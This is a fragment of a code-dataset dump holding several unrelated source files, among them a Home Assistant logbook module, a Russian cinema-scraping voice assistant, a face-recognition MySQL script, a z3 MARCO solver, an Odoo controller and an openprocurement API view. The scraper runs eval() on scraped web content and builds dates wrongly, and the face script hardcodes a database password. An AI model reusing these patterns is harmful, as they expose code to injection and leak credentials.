\"stopped\"\n\n yield Entry(\n event.time_fired, \"Home Assistant\", action,\n domain=HA_DOMAIN)\n\n elif event.event_type == EVENT_LOGBOOK_ENTRY:\n domain = event.data.get(ATTR_DOMAIN)\n entity_id = event.data.get(ATTR_ENTITY_ID)\n if domain is None and entity_id is not None:\n try:\n domain = split_entity_id(str(entity_id))[0]\n except IndexError:\n pass\n\n yield Entry(\n event.time_fired, event.data.get(ATTR_NAME),\n event.data.get(ATTR_MESSAGE), domain,\n entity_id)\n\n\ndef _get_events(hass, config, start_day, end_day):\n \"\"\"Get events for a period of time.\"\"\"\n from homeassistant.components.recorder.models import Events, States\n from homeassistant.components.recorder.util import (\n execute, session_scope)\n\n with session_scope(hass=hass) as session:\n query = session.query(Events).order_by(Events.time_fired) \\\n .outerjoin(States, (Events.event_id == States.event_id)) \\\n .filter(Events.event_type.in_(ALL_EVENT_TYPES)) \\\n .filter((Events.time_fired > start_day)\n & 
(Events.time_fired < end_day)) \\\n .filter((States.last_updated == States.last_changed)\n | (States.state_id.is_(None)))\n events = execute(query)\n return humanify(_exclude_events(events, config))\n\n\ndef _exclude_events(events, config):\n \"\"\"Get list of filtered events.\"\"\"\n excluded_entities = []\n excluded_domains = []\n included_entities = []\n included_domains = []\n exclude = config.get(CONF_EXCLUDE)\n if exclude:\n excluded_entities = exclude[CONF_ENTITIES]\n excluded_domains = exclude[CONF_DOMAINS]\n include = config.get(CONF_INCLUDE)\n if include:\n included_entities = include[CONF_ENTITIES]\n included_domains = include[CONF_DOMAINS]\n\n filtered_events = []\n for event in events:\n domain, entity_id = None, None\n\n if event.event_type == EVENT_STATE_CHANGED:\n entity_id = event.data.get('entity_id')\n\n if entity_id is None:\n continue\n\n # Do not report on new entities\n if event.data.get('old_state') is None:\n continue\n\n new_state = event.data.get('new_state')\n\n # Do not report on entity removal\n if not new_state:\n continue\n\n attributes = new_state.get('attributes', {})\n\n # If last_changed != last_updated only attributes have changed\n # we do not report on that yet.\n last_changed = new_state.get('last_changed')\n last_updated = new_state.get('last_updated')\n if last_changed != last_updated:\n continue\n\n domain = split_entity_id(entity_id)[0]\n\n # Also filter auto groups.\n if domain == 'group' and attributes.get('auto', False):\n continue\n\n # exclude entities which are customized hidden\n hidden = attributes.get(ATTR_HIDDEN, False)\n if hidden:\n continue\n\n elif event.event_type == EVENT_LOGBOOK_ENTRY:\n domain = event.data.get(ATTR_DOMAIN)\n entity_id = event.data.get(ATTR_ENTITY_ID)\n\n if domain or entity_id:\n # filter if only excluded is configured for this domain\n if excluded_domains and domain in excluded_domains and \\\n not included_domains:\n if (included_entities and entity_id not in included_entities) \\\n or not included_entities:\n continue\n # filter if only included is configured for this domain\n elif not excluded_domains and included_domains and \\\n domain not in included_domains:\n if (included_entities and entity_id not in included_entities) \\\n or not included_entities:\n continue\n # filter if included and excluded is configured for this domain\n elif excluded_domains and included_domains and \\\n (domain not in included_domains or\n domain in excluded_domains):\n if (included_entities and entity_id not in included_entities) \\\n or not included_entities or domain in excluded_domains:\n continue\n # filter if only included is configured for this entity\n elif not excluded_domains and not included_domains and \\\n included_entities and entity_id not in included_entities:\n continue\n # check if logbook entry is excluded for this entity\n if entity_id in excluded_entities:\n continue\n filtered_events.append(event)\n return filtered_events\n\n\n# pylint: disable=too-many-return-statements\ndef _entry_message_from_state(domain, state):\n \"\"\"Convert a state to a message for the logbook.\"\"\"\n # We pass domain in so we don't have to split entity_id again\n if domain == 'device_tracker':\n if state.state == STATE_NOT_HOME:\n return 'is away'\n return 'is at {}'.format(state.state)\n\n elif domain == 'sun':\n if state.state == sun.STATE_ABOVE_HORIZON:\n return 'has risen'\n return 'has set'\n\n elif state.state == STATE_ON:\n # Future: combine groups and its entity entries ?\n return \"turned on\"\n\n elif state.state == 
STATE_OFF:\n return \"turned off\"\n\n return \"changed to {}\".format(state.state)\n","repo_name":"jest-community/jest-pytest","sub_path":"src/__tests__/integration/home-assistant/homeassistant/components/logbook.py","file_name":"logbook.py","file_ext":"py","file_size_in_byte":13711,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"75"} +{"seq_id":"33326107977","text":"import datetime\r\nimport requests\r\nimport json\r\nimport funcs\r\nfrom bs4 import BeautifulSoup\r\n\r\nclass Parser:\r\n def __init__(self, url):\r\n self.header = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\"}\r\n self.session = requests.Session()\r\n self.session.header = self.header\r\n self.html = self.session.post(url).text\r\n self.soup = BeautifulSoup(self.html, \"html.parser\")\r\n if \"sky-cinema\" in url:\r\n self.cinema = \"SC\"\r\n else:\r\n self.cinema = \"CK\"\r\n\r\n def getFilmsParameters(self):\r\n try:\r\n films = {}\r\n filmsParas = \"\"\r\n section = self.soup.find(\"div\",{\"class\":\"afisha-view afisha-view-list show\"})\r\n film_det = section.find_all(\"div\", {\"class\":\"film-detail\"})\r\n for elem in film_det:\r\n for elem2 in elem.find_all(\"div\", {\"class\":\"film-seances filter-block\"}):\r\n for elem3 in elem2:\r\n if (elem3.find(\"a\") != None) and (elem3.find(\"a\") != -1):\r\n currFilmParas = elem3.find(\"a\").get(\"onclick\").replace(\"prebookManager.showHall(\",\"\").replace(\")\", \"\").replace(\";\",\"\").split()[0]\r\n if currFilmParas != \"return\":\r\n filmsParas += currFilmParas.replace(\"}\", \",\")+f\"\\\"time\\\":'{elem3.find('a').get_text()}', \\\"cost\\\":'{elem3.find('span').get_text()+' руб'}', \\\"format\\\":'{elem3.find('li').get('data-title')}', \"+\"}, \"\r\n films[elem.find(\"h3\", {\"class\": \"film-title\"}).get_text()] = elem.find(\"p\", {\"class\":\"film-genre\"}).get_text(), eval(filmsParas), elem.find(\"h3\", {\"class\": \"film-title\"}).find(\"a\").get(\"href\")\r\n return films\r\n except:\r\n return True\r\n\r\ndef cinemaParser(cmdType):\r\n cmd = funcs.voice\r\n\r\n if \"континент\" in cmd.lower():\r\n url = \"https://conti.sky-cinema.ru/\"\r\n\r\n elif \"современник\" in cmd.lower():\r\n url = \"https://sovr.sky-cinema.ru/\"\r\n\r\n else:\r\n url = \"http://gd.sky-cinema.ru/\"\r\n\r\n Helper = Parser(url)\r\n\r\n if cmdType == \"findFilms\":\r\n films = Helper.getFilmsParameters()\r\n try:\r\n if films:\r\n if datetime.datetime.now().hour != 0:\r\n funcs.speak(\"На сегодня нет свободных сеансов, посмотрим на завтра\")\r\n url += \"?schedule_date=2019-{}-{}&schedule_list_ajax=Y\".format(datetime.datetime.now().day+1, datetime.datetime.now().month)\r\n else:\r\n url += \"?schedule_date=2019-{}-{}&schedule_list_ajax=Y\".format(datetime.datetime.now().day, datetime.datetime.now().month)\r\n Helper = Parser(url)\r\n films = Helper.getFilmsParameters()\r\n\r\n for elem in films:\r\n funcs.speak(elem)\r\n funcs.speak(\"Если вы хотите посмотреть информацию о фильме, укажите его название в конце предложения, в именительном падеже. 
Также вы можете указать любой филиал skycinema перед названием фильма, по умолчанию я буду искать фильмы в Гостинном дворе.\")\r\n except:\r\n funcs.speak(\"К сожалению, я не могу найти фильмы в данном филиале\")\r\n \r\n if cmdType == \"findFilmInfoInCinema\":\r\n try:\r\n films = Helper.getFilmsParameters()\r\n if films:\r\n if datetime.datetime.now().hour != 0:\r\n funcs.speak(\"На сегодня нет свободных сеансов, посмотрим на завтра\")\r\n url += \"?schedule_date=2019-{}-{}&schedule_list_ajax=Y\".format(datetime.datetime.now().day+1, datetime.datetime.now().month)\r\n else:\r\n url += \"?schedule_date=2019-{}-{}&schedule_list_ajax=Y\".format(datetime.datetime.now().day, datetime.datetime.now().month)\r\n Helper = Parser(url)\r\n films = Helper.getFilmsParameters()\r\n\r\n filmName = cmd.split()[-1].title()\r\n if filmName in films:\r\n funcs.speak(\"Вот что мне удалось найти\")\r\n funcs.speak(films[filmName][0])\r\n for i in range(len(films[filmName][1])):\r\n print(f'\\n\\nНачало в: {films[filmName][1][i][\"time\"]}\\nСтоимость: {films[filmName][1][i][\"cost\"]}\\nФормат: {films[filmName][1][i][\"format\"]}')\r\n else:\r\n funcs.speak(\"Данного фильма нет в прокате\")\r\n except:\r\n funcs.speak(\"К сожалению, я не могу найти фильм в данном филиале\")","repo_name":"zl0b4/Voice-Assistant","sub_path":"cinemaParserModule.py","file_name":"cinemaParserModule.py","file_ext":"py","file_size_in_byte":4979,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"24272703076","text":"import cv2 #pip install opencv-python\nimport face_recognition #pip install cspan, install dlib, install face_recognition\nimport mysql.connector\nimport os\n\ndb = mysql.connector.connect(\n host=\"localhost\",\n user=\"liam\",\n passwd=\"root\",\n database=\"knownIndividuals\"\n)\n\nc = db.cursor()\n\n#finds image in file and converts it to binary code\nimg = cv2.imread(\"C:/Users/Liam/Desktop/Main project/images/G00377746.jpg\")\nrgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\nimg_encoding = face_recognition.face_encodings(rgb_img)[0]\nprint(img_encoding)\n\n#finds image in file and converts it to binary code\nimg2 = cv2.imread(\"C:/Users/Liam/Desktop/Main project/images/G00377746Test.jpg\")\nrgb_img2 = cv2.cvtColor(img2, cv2.COLOR_BGR2RGB)\nimg_encoding2 = face_recognition.face_encodings(rgb_img2)[0]\n\n#compares binary code of two images and sees if they are both the same\nresults = face_recognition.compare_faces([img_encoding], img_encoding2)\nprint(results)\nif results == [True]:\n print(\"found a match\")\n #removes the previously found person\n c.execute(\"delete from currentid;\")\n db.commit()\n #puts in the name of the person who is currently identified, this is used as a reference to pull the correct data\n c.execute(\"insert into currentid values ('G00377746');\")\n db.commit()\n \nelse:\n print(\"unknown\")\n \n\ncv2.imshow(\"img\", img)","repo_name":"LiamB16/Applied-Project-and-minor-dissertation","sub_path":"Camera2.py","file_name":"Camera2.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9782907864","text":"# Пройдите в цикле по списку [\"Вася\", \"Маша\", \"Петя\", \"Валера\", \"Саша\", \"Даша\"] пока не встретите имя \"Валера\".\n# Когда найдете напишите \"Валера нашелся\". 
Подсказка: используйте метод list.pop()\n# Перепишите предыдущий пример в виде функции find_person(name), которая ищет имя в списке.\n\n# Задаём переменные\nNAMES = [\"Вася\", \"Маша\", \"Петя\", \"Валера\", \"Саша\", \"Даша\"]\n\ndef find_person(search_name):\n find_status = 'Не найден'\n while len(NAMES) > 0:\n name = NAMES.pop()\n # print(name)\n if name == search_name:\n find_status = 'Нашёлся!'\n break\n return find_status\n\nprint(NAMES)\nprint('Валера: {}'.format(find_person('Валера')))\n","repo_name":"Frostman13/homework","sub_path":"lesson1/hw23.py","file_name":"hw23.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6159884136","text":"from random import shuffle\nimport time\nfrom z3 import *\nfrom typing import Optional, Callable\nimport networkx\nfrom pydantic import BaseModel\nfrom itertools import product, combinations\n\n\nclass RuleSet(BaseModel):\n rules: set[int]\n setId: int\n\n\nclass Error(BaseModel):\n error_id: int\n mus_list: list[RuleSet]\n mcs_list: list[RuleSet]\n mss_list: list[RuleSet]\n\n\nclass Marco:\n def __init__(self, rules: set[int],\n sat_fun: Callable[[set[int]], bool],\n parent_relations: list[tuple[int, int]],\n optimization: bool = True\n ):\n self.rules = frozenset(rules)\n self.graph = networkx.Graph()\n self.mus_list: set[frozenset[int]] = set()\n self.mss_list: set[frozenset[int]] = set()\n self.mcs_list: set[frozenset[int]] = set()\n self.tc_errors: list[Error] = []\n self.parent_relations: list[tuple[int, int]] = parent_relations\n self.solver = Solver()\n self.loop_counter = 0\n self.sat_counter = 0\n self.max_loops = 999\n self.sat_fun = sat_fun\n self.optimization = optimization\n\n def grow(self, seed: frozenset[int]) -> frozenset[int]:\n # print('growing')\n for c in (self.rules - seed):\n if self.sat(seed | {c}):\n seed = seed | {c}\n\n return seed\n\n def shrink(self, seed: frozenset[int]) -> frozenset[int]:\n # print('shrinking ', seed)\n for c in seed:\n if not self.sat(seed - {c}):\n seed = seed - {c}\n\n return seed\n\n def get_other_msses(self, mcs: frozenset[int]) -> set[frozenset[int]]:\n # if relation holds: parent_child(p1, p2), and P - ({p2} + C) is MSS, and pi\n # then P - ({p1) + C) + {pi . 
parent_child(p1, pi}\n # print('getting other mss')\n alternatives = []\n for rule in mcs:\n replacers = [rule]\n for parent, child in self.parent_relations:\n if child == rule:\n replacers.append(parent)\n alternatives.append(replacers)\n\n possible_mixes = product(*alternatives)\n combination_sets = {frozenset(combination) for combination in possible_mixes}\n remove_parent_child = set()\n for possible_mcs in combination_sets:\n removed = set(possible_mcs)\n for comb in combinations(possible_mcs, 2):\n if (comb[0], comb[1]) in self.parent_relations:\n removed.remove(comb[1])\n elif (comb[1], comb[0]) in self.parent_relations:\n removed.remove(comb[0])\n remove_parent_child.add(frozenset(removed))\n\n\n new_mcses = remove_parent_child - {mcs}\n return new_mcses\n # if len(new_mcses) == 0:\n # return set()\n # else:\n # new_mcses_ = [new_mcses]\n # for new_mcs in new_mcses:\n # new_mcses_.append(self.get_other_msses(new_mcs))\n # new_new_mcses = set().union(*new_mcses_)\n # print('for set ', mcs, ' \\nthe new mcses are generated: ', new_mcses)\n # print('for set ', mcs, ' \\nthe new new mcses are generated: ', new_new_mcses)\n # return set().union(*new_mcses_)\n\n # return [set(s) for s in combination_sets if s != frozenset(mus)]\n def get_unexplored(self, model: ModelRef) -> frozenset[int]:\n seeds = []\n for rid in self.rules:\n assignment: bool = not is_false(model.eval(Bool(rid)))\n seeds.append(assignment)\n # print(seeds)\n return frozenset({ruleId for keep, ruleId in zip(seeds, self.rules) if keep})\n\n def is_satisfiable(self) -> (bool, Optional[ModelRef]):\n if self.solver.check().r == 1:\n return True, self.solver.model()\n else:\n return False, None\n\n def sat(self, rules: frozenset[int]) -> bool:\n self.sat_counter += 1\n return self.sat_fun(set(rules))\n\n def run(self):\n print('start marco', time.time())\n successful, model = self.is_satisfiable()\n while successful:\n if self.loop_counter >= self.max_loops:\n raise Exception(\"Too many loops\")\n self.loop_counter += 1\n if len(self.mss_list) > 1 and len(self.mss_list) > 16:\n print('finished prematurely after ', self.sat_counter, ' runs', time.time())\n return\n\n seed = self.get_unexplored(model)\n if self.sat(seed):\n mss = self.grow(seed)\n\n self.mss_list.add(mss)\n self.solver.add(Or([Bool(r) for r in self.rules if r not in mss]))\n if self.optimization:\n other_mcses = self.get_other_msses(self.rules - mss)\n for other_mcs in other_mcses:\n self.solver.add(Or([Bool(r) for r in self.rules if r in other_mcs]))\n\n\n else:\n mus = self.shrink(seed)\n self.mus_list.add(frozenset(mus))\n self.solver.add(Not(And([Bool(r) for r in mus])))\n\n successful, model = self.is_satisfiable()\n print('finished after ', self.sat_counter, ' runs', time.time())\n\n def analyse(self):\n mcs_counter = 0\n # Populate mcs list\n print('start analysis', time.time())\n for mss in self.mss_list:\n self.mcs_list.add(self.rules - mss)\n\n mus_index_list = list(enumerate(self.mus_list))\n self.graph.add_nodes_from([i for i, mus in mus_index_list])\n\n for combination in combinations(mus_index_list, 2):\n index1, mus1 = combination[0]\n index2, mus2 = combination[1]\n if mus1 & mus2 != set():\n self.graph.add_edge(index1, index2)\n print('finish building graph', time.time())\n for i, component in enumerate(networkx.connected_components(self.graph)):\n\n mus_list = [mus_index_list[musId][1] for musId in component]\n mcs_list = []\n mss_list = []\n all_mus_rules: set[int] = set().union(*[mus for mus in mus_list])\n reduced_mcses = 
[RuleSet(setId=mcsId, rules=mcs & all_mus_rules) for mcsId, mcs in enumerate(self.mcs_list)]\n non_empty_mcses = [mcs for mcs in reduced_mcses if len(mcs.rules) != 0]\n seen = []\n for mcs in non_empty_mcses:\n if mcs.rules in seen:\n continue\n else:\n seen.append(mcs.rules)\n mcs_list.append(mcs)\n mss_list.append([RuleSet(setId=mssId, rules=mss) for mssId, mss in enumerate(self.mss_list) if mssId == mcs.setId][0])\n\n mus_ruleset = [RuleSet(setId=musId, rules=set(mus)) for musId, mus in enumerate(mus_list)]\n self.tc_errors.append(Error(error_id=i, mus_list=mus_ruleset, mcs_list=mcs_list, mss_list=mss_list))\n print('finish analysis', time.time())\n\n def show(self):\n print(f\"Process finished after {self.loop_counter} iterations\")\n print(f\"{len(self.tc_errors)} islands found in the code\")\n for island in self.tc_errors:\n print(f\"island:\")\n print(f\"\\nMUSs:\")\n for mus in island.mus_list:\n print(mus)\n\n print(f\"\\nMCSs:\")\n for mcs in island.mcs_list:\n print(mcs)\n print(\"\\n\\n\")\n\n\n\n","repo_name":"maybetonyfu/lof","sub_path":"src/marco.py","file_name":"marco.py","file_ext":"py","file_size_in_byte":7416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14745277299","text":"from odoo import http\nfrom odoo.http import request\nfrom odoo.addons.website.controllers.main import QueryURL\nfrom odoo.addons.http_routing.models.ir_http import slug\n\nPPG = 20 # Properties Per Page\nPPR = 4 # Properties Per Row\nclass TableCompute(object):\n\n def __init__(self):\n self.table = {}\n\n def _check_place(self, posx, posy, sizex, sizey):\n res = True\n for y in range(sizey):\n for x in range(sizex):\n if posx + x >= PPR:\n res = False\n break\n row = self.table.setdefault(posy + y, {})\n if row.setdefault(posx + x) is not None:\n res = False\n break\n for x in range(PPR):\n self.table[posy + y].setdefault(x, None)\n return res\n\n def process(self, products, ppg=PPG):\n # Compute products positions on the grid\n minpos = 0\n index = 0\n maxy = 0\n x = 0\n for p in products:\n x = min(max(p.website_size_x, 1), PPR)\n y = min(max(p.website_size_y, 1), PPR)\n if index >= ppg:\n x = y = 1\n\n pos = minpos\n while not self._check_place(pos % PPR, pos // PPR, x, y):\n pos += 1\n # if 21st products (index 20) and the last line is full (PPR products in it), break\n # (pos + 1.0) / PPR is the line where the product would be inserted\n # maxy is the number of existing lines\n # + 1.0 is because pos begins at 0, thus pos 20 is actually the 21st block\n # and to force python to not round the division operation\n if index >= ppg and ((pos + 1.0) // PPR) > maxy:\n break\n\n if x == 1 and y == 1: # simple heuristic for CPU optimization\n minpos = pos // PPR\n\n for y2 in range(y):\n for x2 in range(x):\n self.table[(pos // PPR) + y2][(pos % PPR) + x2] = False\n self.table[pos // PPR][pos % PPR] = {\n 'product': p, 'x': x, 'y': y,\n 'class': \" \".join(x.html_class for x in p.website_style_ids if x.html_class)\n }\n if index <= ppg:\n maxy = max(maxy, y + (pos // PPR))\n index += 1\n\n # Format table according to HTML needs\n rows = sorted(self.table.items())\n rows = [r[1] for r in rows]\n for col in range(len(rows)):\n cols = sorted(rows[col].items())\n x += len(cols)\n rows[col] = [r[1] for r in cols if r[1]]\n\n return rows\n\nclass WebsiteProductImage(http.Controller):\n\n @http.route(['/product/image_effect_config'], type='json', auth=\"public\", website=True)\n def get_image_effect_config(self):\n cur_website = 
request.website\n values = {\n 'no_extra_options': cur_website.no_extra_options,\n 'theme_panel_position': cur_website.thumbnail_panel_position,\n 'interval_play': cur_website.interval_play,\n 'enable_disable_text': cur_website.enable_disable_text,\n 'color_opt_thumbnail': cur_website.color_opt_thumbnail,\n 'change_thumbnail_size': cur_website.change_thumbnail_size,\n 'thumb_height': cur_website.thumb_height,\n 'thumb_width': cur_website.thumb_width,\n }\n return values\n\n def _get_search_order(self, post):\n # OrderBy will be parsed in orm and so no direct sql injection\n # id is added to be sure that order is a unique sort key\n return 'website_published desc,%s , id desc' % post.get('order', 'website_sequence desc')\n\n def _get_compute_currency_and_context(self):\n pricelist_context = dict(request.env.context)\n pricelist = False\n if not pricelist_context.get('pricelist'):\n pricelist = request.website.get_current_pricelist()\n pricelist_context['pricelist'] = pricelist.id\n else:\n pricelist = request.env['product.pricelist'].browse(pricelist_context['pricelist'])\n\n from_currency = request.env.user.company_id.currency_id\n to_currency = pricelist.currency_id\n compute_currency = lambda price: from_currency.compute(price, to_currency)\n\n return compute_currency, pricelist_context, pricelist\n\n\n def _get_search_domain(self, search, category, attrib_values):\n domain = request.website.sale_property_domain()\n if search:\n for srch in search.split(\" \"):\n domain += [\n '|', '|', '|', ('name', 'ilike', srch), ('description', 'ilike', srch),\n ('description_sale', 'ilike', srch), ('product_variant_ids.default_code', 'ilike', srch)]\n\n if category:\n domain += [('public_categ_ids', 'child_of', int(category))]\n\n if attrib_values:\n attrib = None\n ids = []\n for value in attrib_values:\n if not attrib:\n attrib = value[0]\n ids.append(value[1])\n elif value[0] == attrib:\n ids.append(value[1])\n else:\n domain += [('attribute_line_ids.value_ids', 'in', ids)]\n attrib = value[0]\n ids = [value[1]]\n if attrib:\n domain += [('attribute_line_ids.value_ids', 'in', ids)]\n\n return domain\n\n @http.route([\n '/property',\n '/property/page/',\n '/property/category/',\n '/property/category//page/'\n ], type='http', auth=\"public\", website=True)\n def property(self, page=0, category=None, search='', ppg=False, **post):\n if ppg:\n try:\n ppg = int(ppg)\n except ValueError:\n ppg = PPG\n post[\"ppg\"] = ppg\n else:\n ppg = PPG\n\n attrib_list = request.httprequest.args.getlist('attrib')\n attrib_values = [[int(x) for x in v.split(\"-\")] for v in attrib_list if v]\n attributes_ids = {v[0] for v in attrib_values}\n attrib_set = {v[1] for v in attrib_values}\n\n domain = self._get_search_domain(search, category, attrib_values)\n\n keep = QueryURL('/property', category=category and int(category), search=search, attrib=attrib_list, order=post.get('order'))\n\n compute_currency, pricelist_context, pricelist = self._get_compute_currency_and_context()\n\n request.context = dict(request.context, pricelist=pricelist.id, partner=request.env.user.partner_id)\n\n url = \"/property\"\n if search:\n post[\"search\"] = search\n if category:\n category = request.env['product.public.category'].browse(int(category))\n url = \"/property/category/%s\" % slug(category)\n if attrib_list:\n post['attrib'] = attrib_list\n\n categs = request.env['product.public.category'].search([('parent_id', '=', False)])\n Product = request.env['product.template']\n\n parent_category_ids = []\n if category:\n 
parent_category_ids = [category.id]\n current_category = category\n while current_category.parent_id:\n parent_category_ids.append(current_category.parent_id.id)\n current_category = current_category.parent_id\n\n product_count = Product.search_count(domain)\n pager = request.website.pager(url=url, total=product_count, page=page, step=ppg, scope=7, url_args=post)\n products = Product.search(domain, limit=ppg, offset=pager['offset'], order=self._get_search_order(post))\n\n ProductAttribute = request.env['product.attribute']\n if products:\n # get all products without limit\n selected_products = Product.search(domain, limit=False)\n attributes = ProductAttribute.search([('attribute_line_ids.product_tmpl_id', 'in', selected_products.ids)])\n else:\n attributes = ProductAttribute.browse(attributes_ids)\n\n values = {\n 'search': search,\n 'category': category,\n 'attrib_values': attrib_values,\n 'attrib_set': attrib_set,\n 'pager': pager,\n 'pricelist': pricelist,\n 'products': products,\n 'search_count': product_count, # common for all searchbox\n 'bins': TableCompute().process(products, ppg),\n 'rows': PPR,\n 'categories': categs,\n 'attributes': attributes,\n 'compute_currency': compute_currency,\n 'keep': keep,\n 'parent_category_ids': parent_category_ids,\n }\n if category:\n values['main_object'] = category\n return request.render(\"website_sale.products\", values)\n","repo_name":"odoo-modules/realestate","sub_path":"itsys_real_estate/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8893,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"15802406941","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n\ndef createBST(root, newNode):\n if root is None:\n return root\n\n if newNode.data < root.data:\n if root.left is None:\n root.left = newNode\n else:\n createBST(root.left, newNode)\n else:\n if root.right is None:\n root.right = newNode\n else:\n createBST(root.right, newNode)\n \n\ndef preOrrderTraversal(root):\n if root:\n print(root.data)\n preOrrderTraversal(root.left)\n preOrrderTraversal(root.right)\n\ndef bfsTraversal(root):\n queue = []\n queue.append(root)\n while(len(queue) > 0):\n root = queue.pop(0)\n print(root.data, end=\" \")\n if root.left is not None:\n queue.append(root.left)\n if root.right is not None:\n queue.append(root.right)\n \n\ndef InOrrderTraversal(root):\n if root:\n InOrrderTraversal(root.left)\n print(root.data)\n InOrrderTraversal(root.right)\n\ndef inOrderWithoutRecursion(root):\n queue = []\n current = root\n while True:\n if current is not None:\n queue.append(current)\n current = current.left\n elif(queue):\n current = queue.pop()\n print(current.data)\n current = current.right\n else:\n break\n\nroot = Node(4)\ncreateBST(root, Node(5))\ncreateBST(root, Node(2))\ncreateBST(root, Node(1))\ncreateBST(root, Node(3))\n# preOrrderTraversal(root)\n# bfsTraversal(root)\n# InOrrderTraversal(root)\ninOrderWithoutRecursion(root)","repo_name":"AnchalNigam/Code-Time","sub_path":"BSTRevision.py","file_name":"BSTRevision.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36344465589","text":"from logging import getLogger\nfrom typing import Optional, List, Tuple\n\nfrom pyramid.request import Request\nfrom pyramid.security import Allow, Everyone, ALL_PERMISSIONS\n\nfrom openprocurement.tender.core.procedure.utils 
import get_items\nfrom openprocurement.tender.core.procedure.views.base import TenderBaseResource\nfrom openprocurement.api.utils import context_unpack, json_view\nfrom openprocurement.tender.core.procedure.utils import save_tender, set_item\nfrom openprocurement.tender.core.procedure.serializers.criterion_rg_requirement_evidence import (\n EligibleEvidenceSerializer,\n)\nfrom openprocurement.tender.core.procedure.state.criterion_rq_requirement_evidence import EligibleEvidenceState\nfrom openprocurement.tender.core.procedure.models.criterion import (\n EligibleEvidence,\n PatchEligibleEvidence\n)\nfrom openprocurement.tender.core.procedure.views.criterion_rg_requirement import (\n resolve_criterion,\n resolve_requirement_group,\n resolve_requirement,\n)\nfrom openprocurement.tender.core.procedure.validation import (\n unless_administrator,\n validate_item_owner,\n validate_input_data,\n validate_patch_data_simple,\n)\n\n\nLOGGER = getLogger(__name__)\n\n\ndef resolve_eligible_evidence(request: Request) -> None:\n match_dict = request.matchdict\n if match_dict.get(\"evidence_id\"):\n evidence_id = match_dict[\"evidence_id\"]\n evidences = get_items(\n request,\n request.validated[\"requirement\"],\n \"eligibleEvidences\",\n evidence_id,\n )\n request.validated[\"evidence\"] = evidences[0]\n\n\nclass BaseEligibleEvidenceResource(TenderBaseResource):\n\n def __acl__(self) -> List[Tuple[str, str, str]]:\n return [\n (Allow, Everyone, \"view_tender\"),\n (Allow, \"g:brokers\", \"create_evidence\"),\n (Allow, \"g:brokers\", \"edit_evidence\"),\n (Allow, \"g:Administrator\", \"edit_evidence\"),\n (Allow, \"g:admins\", ALL_PERMISSIONS),\n ]\n\n serializer_class = EligibleEvidenceSerializer\n state_class = EligibleEvidenceState\n\n def __init__(self, request: Request, context=None) -> None:\n super().__init__(request, context)\n if context and request.matchdict:\n resolve_criterion(request)\n resolve_requirement_group(request)\n resolve_requirement(request)\n resolve_eligible_evidence(request)\n\n @json_view(\n content_type=\"application/json\",\n validators=(\n unless_administrator(validate_item_owner(\"tender\")),\n validate_input_data(EligibleEvidence),\n ),\n permission=\"create_evidence\",\n )\n def collection_post(self) -> Optional[dict]:\n\n evidence = self.request.validated[\"data\"]\n requirement = self.request.validated[\"requirement\"]\n\n if \"eligibleEvidences\" not in requirement:\n requirement[\"eligibleEvidences\"] = []\n requirement[\"eligibleEvidences\"].append(evidence)\n\n self.state.evidence_on_post(requirement)\n\n if save_tender(self.request):\n self.LOGGER.info(\n f\"Created requirement eligible evidence {evidence['id']}\",\n extra=context_unpack(\n self.request,\n {\"MESSAGE_ID\": \"requirement_eligible_evidence_create\"},\n {\"evidence_id\": evidence[\"id\"]},\n ),\n )\n tender = self.request.validated[\"tender\"]\n match_dict = self.request.matchdict\n self.request.response.status = 201\n self.request.response.headers[\"Location\"] = self.request.route_url(\n f\"{tender['procurementMethodType']}:Requirement Eligible Evidence\",\n tender_id=match_dict.get(\"tender_id\"),\n criterion_id=match_dict.get(\"criterion_id\"),\n requirement_group_id=match_dict.get(\"requirement_group_id\"),\n requirement_id=match_dict.get(\"requirement_id\"),\n evidence_id=evidence[\"id\"],\n )\n return {\"data\": self.serializer_class(evidence).data}\n\n @json_view(permission=\"view_tender\")\n def collection_get(self) -> dict:\n requirement = self.request.validated[\"requirement\"]\n data = 
tuple(self.serializer_class(req).data for req in requirement.get(\"eligibleEvidences\", \"\"))\n return {\"data\": data}\n\n @json_view(permission=\"view_tender\")\n def get(self) -> dict:\n data = self.serializer_class(self.request.validated[\"evidence\"]).data\n return {\"data\": data}\n\n @json_view(\n content_type=\"application/json\",\n validators=(\n unless_administrator(validate_item_owner(\"tender\")),\n validate_input_data(PatchEligibleEvidence),\n validate_patch_data_simple(EligibleEvidence, \"evidence\"),\n ),\n permission=\"edit_evidence\",\n )\n def patch(self) -> Optional[dict]:\n updated_evidence = self.request.validated[\"data\"]\n if not updated_evidence:\n return\n evidence = self.request.validated[\"evidence\"]\n requirement = self.request.validated[\"requirement\"]\n\n self.state.evidence_on_patch(evidence, updated_evidence)\n\n set_item(requirement, \"eligibleEvidences\", evidence[\"id\"], updated_evidence)\n\n if save_tender(self.request):\n self.LOGGER.info(\n f\"Updated requirement eligible evidence {evidence['id']}\",\n extra=context_unpack(self.request, {\"MESSAGE_ID\": \"requirement_eligible_evidence_patch\"}),\n )\n return {\"data\": self.serializer_class(updated_evidence).data}\n\n @json_view(\n validators=(unless_administrator(validate_item_owner(\"tender\"))),\n permission=\"edit_evidence\",\n )\n def delete(self):\n evidence = self.request.validated[\"evidence\"]\n requirement = self.request.validated[\"requirement\"]\n\n self.state.evidence_on_delete(evidence)\n\n requirement[\"eligibleEvidences\"].remove(evidence)\n if not requirement[\"eligibleEvidences\"]:\n del 